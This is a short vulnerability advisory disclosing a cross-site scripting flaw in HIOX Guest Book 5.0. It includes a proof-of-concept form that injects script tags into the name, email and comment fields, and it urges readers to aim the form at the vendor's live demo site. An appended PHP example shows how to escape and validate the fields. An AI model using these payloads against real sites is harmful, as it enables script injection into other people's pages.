HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

2014-01-03 18:42:20
Posted by: JoKeR_StEx

#############################################################################

# Exploit Title : HIOX GUEST BOOK 5.0 (HGB-5.0) Cross Site Scripting

# Author : JoKeR_StEx

# Tested On : Windows

# Download Software Link : http://www.hscripts.com/scripts/php/guest-book.php

# Date : 03/01/2014

#############################################################################
[+] P.O.C

<form action="http://127.0.0.1/HGB/add.php" method="POST">
<!--In Name -->
<input type="hidden" name="name1" value=""><script>prompt('JoKeR_StEx')</script>">
<!-- In Email -->
<input type="hidden" name="email" value=""><script>prompt('xss (email)')</script>">
<!-- in comment -->
<input type="hidden" name="cmt" value=""><script>prompt('xss (comment)')</script>">
</form>

[+] To Test the Exploit (Example)

ex:http://www.hscripts.com/scripts/php/HGB/index.php

Just replace http://127.0.0.1/HGB/add.php with http://www.hscripts.com/scripts/php/HGB/index.php ^___^

################################################################################
# Gr33t'z To : Asesino04 , Shield Dz , & All My Friends & All Algerians
################################################################################
Facebook : fb.me/imadlilong.lasvegas
twitter : @JoKeR_StEx



Fixes

No fixes
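
One way to close the three injection points shown in the P.O.C, as an added example that is not part of the original advisory and not HIOX Guest Book's own code. Only the field names name1, email and cmt come from the P.O.C form; the function names and length limits are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not HIOX Guest Book's own code.
// Field names come from the PoC form; the length limits are assumed.

// Encode for an HTML text or quoted-attribute context.
function hgb_escape(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Validate a submitted entry; returns the cleaned fields or null to reject.
function hgb_validate_entry(array $post): ?array
{
    $fields = [];
    foreach (['name1' => 100, 'email' => 254, 'cmt' => 2000] as $key => $max) {
        $value = $post[$key] ?? '';
        // Reject array-typed parameters (name1[]=...) before string handling.
        if (!is_string($value)) {
            return null;
        }
        $value = trim($value);
        if ($value === '' || strlen($value) > $max) {
            return null;
        }
        $fields[$key] = $value;
    }
    // The e-mail field has a strict grammar, so validate it outright.
    if (filter_var($fields['email'], FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    return $fields;
}

// Render a stored entry; every field is encoded at output time.
function hgb_render_entry(array $entry): string
{
    return '<div class="entry"><b>' . hgb_escape($entry['name1']) . '</b> &lt;'
        . hgb_escape($entry['email']) . '&gt;<p>'
        . nl2br(hgb_escape($entry['cmt'])) . '</p></div>';
}

// Constructed sample input reusing the comment payload from the PoC.
$sample = [
    'name1' => 'Alice',
    'email' => 'alice@example.org',
    'cmt'   => '"><script>prompt(\'xss (comment)\')</script>',
];
$entry = hgb_validate_entry($sample);
echo $entry === null ? "rejected\n" : hgb_render_entry($entry) . "\n";
```

Encoding at output is what neutralises the comment payload; the validation step only narrows what gets stored, and entries already in the guest book need the same encoding when they are displayed.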
